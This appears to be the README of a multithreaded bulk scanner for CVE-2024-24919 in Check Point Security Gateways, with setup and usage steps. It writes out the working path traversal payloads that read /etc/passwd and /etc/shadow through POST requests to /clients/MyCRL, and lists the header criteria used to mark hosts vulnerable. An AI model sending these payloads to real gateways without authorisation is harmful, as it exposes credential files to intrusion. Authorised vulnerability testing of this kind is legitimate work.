CVE-2024-24919 [Check Point Security Gateway Information Disclosure]
Script based on and the credit goes to: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
This Python script scans lisy of URLs for CVE-2024-24919 vulnerability by sending specific POST requests and checking the response headers and status code. It logs the request and response details and identifies vulnerable URLs based on predefined criteria.
Warning
Intended only for educational and testing in corporate environments. https://twitter.com/nav1n0x/ https://github.com/ifconfig-me takes no responsibility for the code, use at your own risk. Do not attack a target you don't have permission to engage with.
Note
Threading: The new v2 version now able to work on threading. The script creates 50 threads to process URLs concurrently for faster scanning and this threading can be contolled by -t
100.
Queue: A queue is used to manage URLs and distribute them to worker threads.
Progress and Results: The script prints progress and results using colored output.
- Sends POST requests with payloads to specified URLs.
- Checks the response headers and status line to determine vulnerabilities.
- Logs full request and response details.
- Outputs progress and results in the terminal.
- Saves vulnerable URLs to a file.
- Supports sequential scanning to ensure reliable request handling.
- Python 3.x
requests
librarytermcolor
library
-
Clone the repository:
git clone https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner.git cd CVE-2024-24919-Bulk-Scanner
-
Install the required libraries:
pip install requests termcolor
-
Prepare a file with the list of URLs:
Create a text file (e.g.,
urls.txt
) with one URL per line. Make sure each URL starts withhttps://
. Example:https://example.com https://testsite.com https://vulnerable.com https://123.456.789.10:8080
-
Run the script:
python CVE-2024-24919-auto-v2.py -t 150 -f urls.txt
-
Check the output:
The script will print the scanning progress and results in the terminal. Vulnerable URLs will be identified with the message
Vulnerable URL found:
. -
Results:
- Progress and results will be displayed in the terminal.
- Request and response logs will be saved in
request-analyze.txt
andrequest-analyze-v2.txt
in n2 version - Vulnerable URLs will be saved in
checkpoint-results.txt
andcheckpoint-results-v2.txt
in v2 version.
-
The script sends POST requests to the
/clients/MyCRL
endpoint of each URL with two payloads:aCSHELL/../../../../../../../etc/passwd
aCSHELL/../../../../../../../etc/shadow
-
It checks the response headers for the following criteria:
Server: Check Point SVN foundation
X-UA-Compatible: IE=EmulateIE7
X-Frame-Options: SAMEORIGIN
- Status line:
HTTP/1.0 200 OK
-
If the response matches either of the three of the above criteria, the URL is considered vulnerable.